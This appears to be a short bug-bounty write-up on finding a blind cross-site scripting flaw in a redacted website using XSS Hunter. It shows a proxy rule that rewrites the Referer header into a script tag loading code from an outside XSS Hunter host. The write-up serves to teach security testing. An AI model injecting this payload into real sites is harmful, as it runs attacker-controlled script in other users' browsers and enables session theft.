How I found Blind XSS Vulnerability in redacted.com

Today I want to share with you a Blind XSS which I found in private site.In this write-up I will explain how I found Blind XSS and methodologies.

Blind XSS is a flavor of cross site scripting (XSS), in which the attacker “blindly” publishes a series of malicious payloads on web pages that are 
likely to keep them in a constant state (such as in the database or in the log).

Currently I use the XSS hunter (Web version) to find out the Blind XSS.

XSShunter:

XSS Hunter is a recently launched platform that makes pen testing for XSS vulnerabilities much easier to monitor and organize. Through it you can launch all kinds of XSS attacks, but where it really shines is when carrying out a Blind XSS attack.

Step 1: To create a new rule, as none of the pre-defined ones does what we need, click “Add”, and you’ll see the new rule dialogue appear. Click the “Type” drop-down and click “Request header”.

Then, add ^Referer.*$ as the “Match” criteria. This string is a regular expression that matches on any header string that starts with Referer. As there should be only one, if any, then a simple match is all we need.

Next, set the “Replace” text as Referer: “><script src=https://newone.xss.ht></script>. Then, check the “Regex match” checkbox, and click “OK”.

Step 2: When the response is intercepted, you will see in “Raw” request, that the Referer: “><script src=https://newone.xss.ht></script> has been replaced!, as in the image below.

Step 3: After few hours, when I went back to XSSHunter, it showed that a blind XSS had been executed.